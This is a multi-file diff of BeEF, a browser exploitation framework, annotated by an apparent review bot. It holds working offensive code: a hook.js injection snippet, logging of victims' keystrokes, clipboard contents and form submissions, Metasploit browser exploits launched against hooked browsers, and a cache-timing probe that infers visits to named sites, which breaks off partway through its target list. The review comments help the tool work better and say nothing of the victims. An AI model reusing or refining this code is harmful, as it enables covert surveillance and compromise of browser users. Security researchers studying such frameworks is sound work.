@@ -56,7 +56,7 @@ class Command
print_line("Module parameters:")
driver.interface.cmd['Data'].each{|data|
print_line(data['name'] + " => \"" + data['value'] + "\" # this is the " + data['ui_label'] + " parameter")
print_line(data['name'] + " => \"" + data['value'].to_s + "\" # this is the " + data['ui_label'] + " parameter")
} if not driver.interface.cmd['Data'].nil?
end
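Review bot: `data['value'].to_s` fixes the TypeError for non-String values, but `data['name']` and `data['ui_label']` on the same line are still concatenated raw and will raise in the same way if either is nil. A single interpolated string handles all three fields without per-field `.to_s`.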
@@ -153,7 +153,9 @@ class Command
print_line("Results retrieved: " + Time.at(output[0]['date'].to_i).to_s)
print_line("")
print_line("Response:")
print_line(output[0]['data']['data'].to_s)
output.each do |op|
print_line(op['data']['data'].to_s)
end
end
end
end
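Review bot: the loop now prints every result's data, but the 'Results retrieved' header above it still reports only `output[0]['date']`; print the timestamp per entry inside the loop. `output[0]` also raises NoMethodError on an empty array unless it is guarded above this hunk.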

View File

@@ -31,6 +31,7 @@ class Core
"back" => "Move back from the current context",
"exit" => "Exit the console",
"help" => "Help menu",
"irb" => "Drops into an interactive Ruby environment",
"jobs" => "Print jobs",
"online" => "List online hooked browsers",
"offline" => "List previously hooked browsers",
@@ -150,7 +151,7 @@ class Core
])
BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 30)).each do |zombie|
tbl << [zombie.id,zombie.ip,beef_logo_to_os(BeEF::Extension::Initialization::Models::BrowserDetails.os_icon(zombie.session))]
tbl << [zombie.id,zombie.ip,beef_logo_to_os(BeEF::Core::Models::BrowserDetails.os_icon(zombie.session))]
end
puts "\n"
@@ -181,7 +182,7 @@ class Core
])
BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 30)).each do |zombie|
tbl << [zombie.id,zombie.ip,beef_logo_to_os(BeEF::Extension::Initialization::Models::BrowserDetails.os_icon(zombie.session))]
tbl << [zombie.id,zombie.ip,beef_logo_to_os(BeEF::Core::Models::BrowserDetails.os_icon(zombie.session))]
end
puts "\n"
@@ -236,6 +237,28 @@ class Core
print_status("Target a particular online, hooked browser")
print_status(" Usage: target <id>")
end
def cmd_irb(*args)
@@bare_opts.parse(args) {|opt, idx, val|
case opt
when "-h"
cmd_irb_help
return false
end
}
print_status("Starting IRB shell...\n")
begin
Rex::Ui::Text::IrbShell.new(binding).run
rescue
print_error("Error during IRB: #{$!}\n\n#{$@.join("\n")}")
end
end
def cmd_irb_help(*args)
print_status("Load the IRB, Interative Ruby Shell")
end
def cmd_review(*args)
@@bare_opts.parse(args) {|opt, idx, val|
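Review bot: `Rex::Ui::Text::IrbShell` belongs to Metasploit's Rex library; when the Metasploit extension is not loaded, `Rex` is undefined and the bare `rescue` turns the NameError into a generic 'Error during IRB'. Check `defined?(Rex::Ui::Text::IrbShell)` first and print a clear message. The shell drops the operator into the console's own process with full Ruby access, so it belongs behind the same controls as the rest of the console. Typo in `cmd_irb_help`: 'Interative' should be 'Interactive'.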

View File

@@ -19,7 +19,7 @@ module Console
class ShellInterface
BD = BeEF::Extension::Initialization::Models::BrowserDetails
BD = BeEF::Core::Models::BrowserDetails
def initialize(config)
self.config = config
@@ -195,7 +195,7 @@ class ShellInterface
def2.push({'name' => k, 'value' => v})
}
# End hack
if BeEF::Module.execute(mod_key, self.targetsession.to_s, def2) == true
if BeEF::Module.execute(mod_key, self.targetsession.to_s, def2) != nil
return true
else
return false
@@ -417,21 +417,6 @@ class ShellInterface
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the internal ip address
internal_ip = BD.get(self.targetsession, 'InternalIP')
if not internal_ip.nil?
encoded_internal_ip = CGI.escapeHTML(internal_ip)
encoded_internal_ip_hash = { 'Internal IP' => encoded_internal_ip }
page_name_row = {
'category' => 'Host',
'data' => encoded_internal_ip_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the System Platform
system_platform = BD.get(self.targetsession, 'SystemPlatform')
if not system_platform.nil?
@@ -447,21 +432,6 @@ class ShellInterface
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the internal hostname
internal_hostname = BD.get(self.targetsession, 'InternalHostname')
if not internal_hostname.nil?
encoded_internal_hostname = CGI.escapeHTML(internal_hostname)
encoded_internal_hostname_hash = { 'Internal Hostname' => encoded_internal_hostname }
page_name_row = {
'category' => 'Host',
'data' => encoded_internal_hostname_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the zombie screen size and color depth
screen_params = BD.get(self.targetsession, 'ScreenParams')
if not screen_params.nil?

View File

@@ -1,3 +1,4 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>BeEF Basic Demo</title>
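Review bot: the XHTML 1.0 Strict DOCTYPE is added, but `<html>` on the next line has no `xmlns="http://www.w3.org/1999/xhtml"` attribute, which the Strict DTD requires; without it a validator flags the page. Add the namespace, or use a plain `<!DOCTYPE html>` if the goal is only to leave quirks mode.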

Binary file not shown.

Binary file not shown.

View File

@@ -0,0 +1,19 @@
import java.io.*;
import java.util.*;
import java.net.*;
import java.applet.*;
// Keith Lee
// Twitter: @keith55
// http://milo2012.wordpress.com
// keith.lee2012[at]gmail.com
public class checkJava extends Applet{
public static int results = 0;
public void init() {
}
public int getInfo() {
results = 1;
return results;
}
}
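Review bot: `results` is `public static` while `getInfo` is an instance method that always returns 1, and `init()` is empty; the applet only serves as a presence probe, so say that in a comment. The `java.io`, `java.util` and `java.net` imports are unused, and the class name `checkJava` breaks Java's capitalised class convention (the source file name must match it exactly).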

View File

@@ -0,0 +1,5 @@
<script>
var commandModuleStr = '<script src="' + window.location.protocol + '//' + window.location.host + '/hook.js" type="text/javascript"><\/script>';
document.write(commandModuleStr);
</script>

View File

@@ -66,10 +66,18 @@ module Events
return event['time'].to_s+'s - [Mouse Click] x: '+event['x'].to_s+' y:'+event['y'].to_s+' > '+event['target'].to_s
when 'focus'
return event['time'].to_s+'s - [Focus] Browser has regained focus.'
when 'copy'
return event['time'].to_s+'s - [User Copied Text] "'+event['data'].to_s+'"'
when 'cut'
return event['time'].to_s+'s - [User Cut Text] "'+event['data'].to_s+'"'
when 'paste'
return event['time'].to_s+'s - [User Pasted Text] "'+event['data'].to_s+'"'
when 'blur'
return event['time'].to_s+'s - [Blur] Browser has lost focus.'
when 'keys'
return event['time'].to_s+'s - [User Typed] "'+event['data'].to_s+'" > '+event['target'].to_s
when 'submit'
return event['time'].to_s+'s - [Form Submitted] '+event['data'].to_s+' > '+event['target'].to_s
end
print_debug '[EVENTS] Event handler has received an unknown event'
return 'Unknown event'
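Review bot: the `copy`, `cut` and `paste` branches put `event['data']` straight into the log string. Clipboard contents are controlled by the hooked browser's user, not by the operator, so the admin UI that renders these lines must HTML-escape them; elsewhere in this series BrowserDetails values go through `CGI.escapeHTML` before reaching the grid, and this path needs the same treatment, or the operator's own UI becomes the injection target.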

View File

@@ -1,38 +0,0 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Extension
module Initialization
module RegisterHttpHandler
# Register API calls
BeEF::API::Registrar.instance.register(BeEF::Extension::Initialization::RegisterHttpHandler, BeEF::API::Server, 'mount_handler')
#
# Register the http handler for the initialization script that retrieves
# all the information about hooked browsers.
#
def self.mount_handler(beef_server)
beef_server.mount('/init', BeEF::Extension::Initialization::Handler)
end
end
end
end
end
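Review bot: this deletion pairs with the core `self.mount("/init", BeEF::Core::Handlers::BrowserDetails)` hunk; confirm that `BeEF::Extension::Initialization::Handler` has been moved into the core namespace rather than left behind as an unreferenced file, and that nothing else still registers for `mount_handler` under the old module name.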

View File

@@ -14,166 +14,166 @@
# limitations under the License.
#
module BeEF
module Extension
module Metasploit
module API
module Extension
module Metasploit
module API
module MetasploitHooks
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Modules, 'post_soft_load')
# Load modules from metasploit just after all other module config is loaded
def self.post_soft_load
msf = BeEF::Extension::Metasploit::RpcClient.instance
if msf.login
msf_module_config = {}
path = BeEF::Core::Configuration.instance.get('beef.extension.metasploit.path')
if not BeEF::Extension::Console.resetdb? and File.exists?("#{path}msf-exploits.cache")
module MetasploitHooks
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Modules, 'post_soft_load')
# Load modules from metasploit just after all other module config is loaded
def self.post_soft_load
msf = BeEF::Extension::Metasploit::RpcClient.instance
if msf.login
msf_module_config = {}
path = BeEF::Core::Configuration.instance.get('beef.extension.metasploit.path')
if not BeEF::Core::Console::CommandLine.parse[:resetdb] and File.exists?("#{path}msf-exploits.cache")
print_debug "Attempting to use Metasploit exploits cache file"
raw = File.read("#{path}msf-exploits.cache")
begin
msf_module_config = YAML.load(raw)
msf_module_config = YAML.load(raw)
rescue => e
puts e
puts e
end
count = 1
msf_module_config.each{|k,v|
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_options', [k])
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_payload_options', [k,nil])
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'override_execute', [k, nil, nil])
print_over "Loaded #{count} Metasploit exploits."
count += 1
msf_module_config.each { |k, v|
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_options', [k])
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_payload_options', [k, nil])
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'override_execute', [k, nil, nil])
print_over "Loaded #{count} Metasploit exploits."
count += 1
}
print "\r\n"
else
else
msf_modules = msf.call('module.exploits')
count = 1
msf_modules['modules'].each{|m|
next if not m.include? "/browser/"
m_details = msf.call('module.info', 'exploit', m)
if m_details
key = 'msf_'+m.split('/').last
# system currently doesn't support multilevel categories
#categories = ['Metasploit']
#m.split('/')[0...-1].each{|c|
# categories.push(c.capitalize)
#}
msf_module_config[key] = {
'enable'=> true,
'msf'=> true,
'msf_key' => m,
'name'=> m_details['name'],
'category' => 'Metasploit',
'description'=> m_details['description'],
'authors'=> m_details['references'],
'path'=> path,
'class'=> 'Msf_module'
}
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_options', [key])
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_payload_options', [key,nil])
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'override_execute', [key, nil, nil])
print_over "Loaded #{count} Metasploit exploits."
count += 1
end
msf_modules['modules'].each { |m|
next if not m.include? "/browser/"
m_details = msf.call('module.info', 'exploit', m)
if m_details
key = 'msf_'+m.split('/').last
# system currently doesn't support multilevel categories
#categories = ['Metasploit']
#m.split('/')[0...-1].each{|c|
# categories.push(c.capitalize)
#}
msf_module_config[key] = {
'enable'=> true,
'msf'=> true,
'msf_key' => m,
'name'=> m_details['name'],
'category' => 'Metasploit',
'description'=> m_details['description'],
'authors'=> m_details['references'],
'path'=> path,
'class'=> 'Msf_module'
}
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_options', [key])
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_payload_options', [key, nil])
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'override_execute', [key, nil, nil])
print_over "Loaded #{count} Metasploit exploits."
count += 1
end
}
print "\r\n"
File.open("#{path}msf-exploits.cache", "w") do |f|
f.write(msf_module_config.to_yaml)
print_debug "Wrote Metasploit exploits to cache file"
f.write(msf_module_config.to_yaml)
print_debug "Wrote Metasploit exploits to cache file"
end
end
BeEF::Core::Configuration.instance.set('beef.module', msf_module_config)
end
BeEF::Core::Configuration.instance.set('beef.module', msf_module_config)
end
end
end
# Get module options + payloads when the beef framework requests this information
def self.get_options(mod)
msf_key = BeEF::Core::Configuration.instance.get("beef.module.#{mod}.msf_key")
msf = BeEF::Extension::Metasploit::RpcClient.instance
if msf_key != nil and msf.login
msf_module_options = msf.call('module.options', 'exploit', msf_key)
com = BeEF::Core::Models::CommandModule.first(:name => mod )
if msf_module_options
# Get module options + payloads when the beef framework requests this information
def self.get_options(mod)
msf_key = BeEF::Core::Configuration.instance.get("beef.module.#{mod}.msf_key")
msf = BeEF::Extension::Metasploit::RpcClient.instance
if msf_key != nil and msf.login
msf_module_options = msf.call('module.options', 'exploit', msf_key)
com = BeEF::Core::Models::CommandModule.first(:name => mod)
if msf_module_options
options = BeEF::Extension::Metasploit.translate_options(msf_module_options)
options << { 'name' => 'mod_id', 'id' => 'mod_id' , 'type' => 'hidden', 'value' => com.id}
options << {'name' => 'mod_id', 'id' => 'mod_id', 'type' => 'hidden', 'value' => com.id}
msf_payload_options = msf.call('module.compatible_payloads', msf_key)
if msf_payload_options
options << BeEF::Extension::Metasploit.translate_payload(msf_payload_options)
return options
options << BeEF::Extension::Metasploit.translate_payload(msf_payload_options)
return options
else
print_error "Unable to retrieve metasploit payloads for exploit: #{msf_key}"
print_error "Unable to retrieve metasploit payloads for exploit: #{msf_key}"
end
else
else
print_error "Unable to retrieve metasploit options for exploit: #{msf_key}"
end
end
end
end
end
# Execute function for all metasploit exploits
def self.override_execute(mod, hbsession, opts)
msf = BeEF::Extension::Metasploit::RpcClient.instance
msf_key = BeEF::Core::Configuration.instance.get("beef.module.#{mod}.msf_key")
msf_opts = {}
# Execute function for all metasploit exploits
def self.override_execute(mod, hbsession, opts)
msf = BeEF::Extension::Metasploit::RpcClient.instance
msf_key = BeEF::Core::Configuration.instance.get("beef.module.#{mod}.msf_key")
msf_opts = {}
opts.each { |opt|
next if ['e','ie_session','and_module_id'].include? opt['name']
msf_opts[opt["name"]] = opt["value"]
}
opts.each { |opt|
next if ['e', 'ie_session', 'and_module_id'].include? opt['name']
msf_opts[opt["name"]] = opt["value"]
}
if msf_key != nil and msf.login
# Are the options correctly formatted for msf?
# This call has not been tested
msf.call('module.execute', 'exploit', msf_key, msf_opts)
end
if msf_key != nil and msf.login
# Are the options correctly formatted for msf?
# This call has not been tested
msf.call('module.execute', 'exploit', msf_key, msf_opts)
end
hb = BeEF::HBManager.get_by_session(hbsession)
if not hb
print_error "Could not find hooked browser when attempting to execute module '#{mod}'"
return false
end
hb = BeEF::HBManager.get_by_session(hbsession)
if not hb
print_error "Could not find hooked browser when attempting to execute module '#{mod}'"
return false
end
bopts = []
uri = ""
if msf_opts['SSL']
uri += "https://"
else
uri += "http://"
end
config = BeEF::Core::Configuration.instance.get('beef.extension.metasploit')
uri += config['callback_host'] + ":" + msf_opts['SRVPORT'] + "/" + msf_opts['URIPATH']
bopts = []
uri = ""
if msf_opts['SSL']
uri += "https://"
else
uri += "http://"
end
config = BeEF::Core::Configuration.instance.get('beef.extension.metasploit')
uri += config['callback_host'] + ":" + msf_opts['SRVPORT'] + "/" + msf_opts['URIPATH']
bopts << { :sploit_url => uri }
c = BeEF::Core::Models::Command.new(:data => bopts.to_json,
:hooked_browser_id => hb.id,
:command_module_id => BeEF::Core::Configuration.instance.get("beef.module.#{mod}.db.id"),
:creationdate => Time.new.to_i
).save
bopts << {:sploit_url => uri}
c = BeEF::Core::Models::Command.new(:data => bopts.to_json,
:hooked_browser_id => hb.id,
:command_module_id => BeEF::Core::Configuration.instance.get("beef.module.#{mod}.db.id"),
:creationdate => Time.new.to_i
).save
# Still need to create command object to store a string saying "Exploit launched @ [time]", to ensure BeEF can keep track of
# which exploits where executed against which hooked browsers
return true
end
# Still need to create command object to store a string saying "Exploit launched @ [time]", to ensure BeEF can keep track of
# which exploits where executed against which hooked browsers
return true
end
# Get module options + payloads when the beef framework requests this information
def self.get_payload_options(mod,payload)
msf_key = BeEF::Core::Configuration.instance.get("beef.module.#{mod}.msf_key")
# Get module options + payloads when the beef framework requests this information
def self.get_payload_options(mod, payload)
msf_key = BeEF::Core::Configuration.instance.get("beef.module.#{mod}.msf_key")
msf = BeEF::Extension::Metasploit::RpcClient.instance
if msf_key != nil and msf.login
msf_module_options = msf.call('module.options', 'payload', payload)
com = BeEF::Core::Models::CommandModule.first(:name => mod )
if msf_module_options
msf = BeEF::Extension::Metasploit::RpcClient.instance
if msf_key != nil and msf.login
msf_module_options = msf.call('module.options', 'payload', payload)
com = BeEF::Core::Models::CommandModule.first(:name => mod)
if msf_module_options
options = BeEF::Extension::Metasploit.translate_options(msf_module_options)
return options
else
else
print_error "Unable to retrieve metasploit payload options for exploit: #{msf_key}"
end
end
end
end
end
end
end
end
end
end
end
end
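Review bot: mixing a whole-file re-indent with the single functional change (`BeEF::Extension::Console.resetdb?` to `BeEF::Core::Console::CommandLine.parse[:resetdb]`) makes this hunk hard to review; split whitespace-only changes into their own commit. In the cache branch, `rescue => e; puts e` swallows a corrupt `msf-exploits.cache` and continues with an empty `msf_module_config`, so a damaged cache silently yields zero exploits instead of falling through to the RPC fetch; re-fetch on parse failure. `YAML.load` on that file also instantiates arbitrary Ruby objects, so a writable cache path becomes a code-execution vector against the operator; restrict the types loaded or verify the file before loading. In `override_execute`, `config['callback_host'] + ":" + msf_opts['SRVPORT'] + "/" + msf_opts['URIPATH']` raises TypeError if SRVPORT arrives as an Integer or is absent; use interpolation and validate the three values before building the URI.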

View File

@@ -25,7 +25,7 @@ module Qrcode
require 'uri'
configuration = BeEF::Core::Configuration.instance
BeEF::Extension::Console::Banners.interfaces.each do |int|
BeEF::Core::Console::Banners.interfaces.each do |int|
print_success "QRCode images available for interface: #{int}"
data = ""
configuration.get("beef.extension.qrcode.target").each do |target|

View File

@@ -19,7 +19,7 @@ beef:
enable: true
name: 'XSSRays'
authors: ["antisnatchor"]
clean_timeout: 5000
clean_timeout: 3000
cross_domain: true
# set js_console_logs to false when using BeEF in production (also because IE browser doesn't support the console object)
# set js_console_logs to false when using BeEF in production (also because IE < 9 doesn't support the console object)
js_console_logs: false
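Review bot: `clean_timeout` drops from 5000 to 3000 ms; that is the window in which a slow target page can still call back before its iframe is removed, so a missed ray on a slow page is the first symptom to expect. Record that trade-off in a comment beside the key, the way `js_console_logs` is annotated. The `IE < 9` wording is more accurate than the old blanket 'IE' comment.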

View File

@@ -17,28 +17,26 @@ module BeEF
module Extension
module Xssrays
class Handler
class Handler < BeEF::Core::Router::Router
XS = BeEF::Core::Models::Xssraysscan
XD = BeEF::Core::Models::Xssraysdetail
HB = BeEF::Core::Models::HookedBrowser
def call(env)
@request = Rack::Request.new(env)
get '/' do
# verify if the request contains the hook token
# raise an exception if it's null or not found in the DB
beef_hook = @request['hbsess'] || nil
# raise an error if it's null or not found in the DB
beef_hook = params[:hbsess] || nil
(print_error "[XSSRAYS] Invalid beefhook id: the hooked browser cannot be found in the database";return) if beef_hook.nil? || HB.first(:session => beef_hook) == nil
rays_scan_id = @request['raysid'] || nil
rays_scan_id = params[:raysid] || nil
(print_error "[XSSRAYS] Raysid is null";return) if rays_scan_id.nil?
if @request['action'] == 'ray'
if params[:action] == 'ray'
# we received a ray
parse_rays(rays_scan_id)
else
if @request['action'] == 'finish'
if params[:action] == 'finish'
# we received a notification for finishing the scan
finalize_scan(rays_scan_id)
else
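Review bot: the route checks that `params[:hbsess]` exists in the database, but unlike `get_browser_detail` elsewhere in this series it does not first run `BeEF::Filters.is_valid_hook_session_id?` on it; apply the same filter here so malformed session strings are rejected before any query. `params[:hbsess] || nil` and `params[:raysid] || nil` are redundant, since `params[:x]` already returns nil. With the class now inheriting from `BeEF::Core::Router::Router`, the `(print_error ...; return)` idiom inside `get '/'` still works because Sinatra wraps the block in a method, but an explicit `halt` would make the early exit clearer.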
@@ -47,38 +45,31 @@ module BeEF
end
end
response = Rack::Response.new(
body = [],
status = 200,
header = {
'Pragma' => 'no-cache',
headers 'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0',
'Content-Type' => 'text/javascript',
'Access-Control-Allow-Origin' => '*',
'Access-Control-Allow-Methods' => 'POST'
}
)
response
'Access-Control-Allow-Methods' => 'POST,GET'
end
# parse incoming rays: rays are verified XSS, as the attack vector is calling back BeEF when executed.
def parse_rays(rays_scan_id)
xssrays_scan = XS.first(:id => rays_scan_id)
hooked_browser = HB.first(:session => @request['hbsess'])
hooked_browser = HB.first(:session => params[:hbsess])
if (xssrays_scan != nil)
xssrays_detail = XD.new(
:hooked_browser_id => hooked_browser.id,
:vector_name => @request['n'],
:vector_method => @request['m'],
:vector_poc => @request['p'],
:vector_name => params[:n],
:vector_method => params[:m],
:vector_poc => params[:p],
:xssraysscan_id => xssrays_scan.id
)
xssrays_detail.save
end
print_info("[XSSRAYS] Received ray from HB with ip [#{hooked_browser.ip.to_s}], hooked on domain [#{hooked_browser.domain.to_s}]")
print_debug("[XSSRAYS] Ray info: \n #{@request.query_string}")
print_info("[XSSRAYS] Scan id [#{xssrays_scan.id}] received ray [ip:#{hooked_browser.ip.to_s}], hooked domain [#{hooked_browser.domain.to_s}]")
print_debug("[XSSRAYS] Ray info: \n #{request.query_string}")
end
# finalize the XssRays scan marking the scan as finished in the db
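Review bot: `print_info("[XSSRAYS] Scan id [#{xssrays_scan.id}] ...")` sits after the `if (xssrays_scan != nil)` block closes, so when `raysid` matches no row, `xssrays_scan` is nil and the log line raises NoMethodError instead of reporting the unknown scan; move both print calls inside the guard or add an `else` that prints an error and returns. In the same method `params[:n]`, `params[:m]` and `params[:p]` go straight into `vector_name`, `vector_method` and `vector_poc`; they arrive from the hooked browser's origin, so they should be treated as untrusted (length-limited, and escaped wherever the UI renders them). The `headers` call now sends `Access-Control-Allow-Origin: *` with `POST,GET`; a comment saying the cross-origin callback depends on it would stop a later cleanup from "tightening" it and silently breaking rays.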

View File

@@ -36,3 +36,4 @@ puts "\nRun bundler in your BeEF folder: bundle install"
puts "\nRun BeEF: ./beef"
#Testing fork regroup
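Review bot: `#Testing fork regroup` is a leftover test comment tacked onto the end of the install script, right after `puts "\nRun BeEF: ./beef"`; drop it before merge.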

View File

@@ -14,8 +14,8 @@
// limitations under the License.
//
beef.execute(function() {
var result = "Disabled or not installed";
if (window.console && (window.console.firebug || window.console.exception)) result = "Enabled";
var result = "Not in use or not installed";
if (window.console && (window.console.firebug || window.console.exception)) result = "Enabled and in use!";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "firebug="+result);
});

View File

@@ -0,0 +1,344 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
var hidden_iframe = beef.dom.createInvisibleIframe();
hidden_iframe.setAttribute('id','f');
hidden_iframe.setAttribute('name','f');
hidden_iframe.setAttribute('src','about:blank');
hidden_iframe.setAttribute('style','opacity: 0.1');
var results = "";
var tries = 0;
var isIE = 0;
var isFF = 0;
/*******************************
* SUB-MS TIMER IMPLEMENTATION *
*******************************/
var cycles = 0;
var exec_next = null;
function timer_interrupt() {
cycles++;
if (exec_next) {
var cmd = exec_next;
exec_next = null;
cmd();
}
}
if (beef.browser.isFF() == 1) {
window.addEventListener('message', timer_interrupt, false);
/****************
* SCANNED URLS *
****************/
var targets = [
{ 'category': 'Social networks' },
{ 'name': 'Facebook', 'urls': [ 'https://s-static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js',
'http://static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js',
'http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/HN0ehA1zox_.js' ] },
{ 'name': 'Google Plus', 'urls': [ 'https://ssl.gstatic.com/gb/js/abc/gcm_57b1882492d4d0138a0a7ea7240394ca.js' ] },
{ 'name': 'Dogster', 'urls': [ 'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js.gz',
'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js' ] },
{ 'name': 'MySpace', 'urls': [ 'http://x.myspacecdn.com/modules/common/static/css/futuraglobal_kqj36l0b.css' ] },
{ 'category': 'Content platforms' },
{ 'name': 'Youtube', 'urls': [ 'http://s.ytimg.com/yt/cssbin/www-refresh-vflMpNCTQ.css' ] },
{ 'name': 'Hulu', 'urls': [ 'http://static.huluim.com/system/hulu_0cd8f497_1.css' ] },
{ 'name': 'Flickr', 'urls': [ 'http://l.yimg.com/g/css/c_fold_main.css.v109886.64777.105425.23' ] },
{ 'name': 'JustinBieberMusic.com', 'urls': [ 'http://www.justinbiebermusic.com/underthemistletoe/js/fancybox.js' ] },
{ 'name': 'Playboy', 'urls': [ 'http://www.playboy.com/wp-content/themes/pb_blog_r1-0-0/css/styles.css' /* 4h */ ] },
{ 'name': 'Wikileaks', 'urls': [ 'http://wikileaks.org/squelettes/jquery-1.6.4.min.js' ] },
{ 'category': 'Online media' },
{ 'name': 'New York Times', 'urls': [ 'http://js.nyt.com/js2/build/sitewide/sitewide.js' ] },
{ 'name': 'CNN', 'urls': [ 'http://z.cdn.turner.com/cnn/tmpl_asset/static/www_homepage/835/css/hplib-min.css',
'http://z.cdn.turner.com/cnn/tmpl_asset/static/intl_homepage/564/css/intlhplib-min.css' ] },
{ 'name': 'Reddit', 'urls': [ 'http://www.redditstatic.com/reddit.en-us.xMviOWUyZqo.js' ] },
{ 'name': 'Slashdot', 'urls': [ 'http://a.fsdn.com/sd/classic.css?release_20111207.02' ] },
{ 'name': 'Fox News', 'urls': [ 'http://www.fncstatic.com/static/all/css/head.css?1' ] },
{ 'name': 'AboveTopSecret.com', 'urls': [ 'http://www.abovetopsecret.com/forum/ats-scripts.js' ] },
{ 'category': 'Commerce' },
{ 'name': 'Diapers.com', 'urls': [ 'http://c1.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12',
'http://c3.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12' ] },
{ 'name': 'Expedia', 'urls': [ 'http://www.expedia.com/static/default/default/scripts/expedia/core/e.js?v=release-2011-11-r4.9.317875' ] },
{ 'name': 'Amazon (US)', 'urls': [ 'http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-css-quirks/site-wide-3527593236.css._V162874846_.css' ] },
{ 'name': 'Newegg', 'urls': [ 'http://images10.newegg.com/WebResource/Themes/2005/CSS/template.v1.w.5723.0.css' ] },
{ 'name': 'eBay', 'urls': [ 'http://ir.ebaystatic.com/v4js/z/io/gbsozkl4ha54vasx4meo3qmtw.js' ] },
{ 'category': 'Coding' },
{ 'name': 'GitHub', 'urls': [ 'https://a248.e.akamai.net/assets.github.com/stylesheets/bundles/github-fa63b2501ea82170d5b3b1469e26c6fa6c3116dc.css' ] },
{ 'category': 'Security' },
{ 'name': 'Exploit DB', 'urls': [ 'http://www.exploit-db.com/wp-content/themes/exploit/style.css' ] },
{ 'name': 'Packet Storm', 'urls': [ 'http://packetstormsecurity.org/img/pss.ico' ] },
{ 'category': 'Email' },
{ 'name': 'Hotmail', 'urls': [ 'https://secure.shared.live.com/~Live.SiteContent.ID/~16.2.9/~/~/~/~/css/R3WinLive1033.css' ] }
];
/*************************
* CONFIGURABLE SETTINGS *
*************************/
var TIME_LIMIT = 5;
var MAX_ATTEMPTS = 2;
}
if (beef.browser.isIE() == 1) {
/****************
* SCANNED URLS *
****************/
var targets = [
{ 'category': 'Social networks' },
{ 'name': 'Facebook', 'urls': [ 'http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png',
'https://s-static.ak.facebook.com/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png' ] },
{ 'name': 'Twitter', 'urls': [ 'http://twitter.com/phoenix/favicon.ico',
'https://twitter.com/phoenix/favicon.ico' ] },
{ 'name': 'LinkedIn', 'urls': [ 'http://static01.linkedin.com/scds/common/u/img/sprite/sprite_global_v6.png',
'http://s3.licdn.com/scds/common/u/img/logos/logo_2_237x60.png',
'http://s4.licdn.com/scds/common/u/img/logos/logo_132x32_2.png' ] },
{ 'name': 'Orkut', 'urls': [ 'http://static3.orkut.com/img/gwt/logo_orkut_default.png' ] },
{ 'name': 'Dogster', 'urls': [ 'http://a2.cdnsters.com/static/images/sitewide/logos/dsterBanner-sm.png' ] },
{ 'category': 'Content platforms' },
{ 'name': 'Youtube', 'urls': [ 'http://s.ytimg.com/yt/favicon-refresh-vfldLzJxy.ico' ] },
{ 'name': 'Hulu', 'urls': [ 'http://www.hulu.com/fat-favicon.ico' ] },
{ 'name': 'Flickr', 'urls': [ 'http://l.yimg.com/g/favicon.ico' ] },
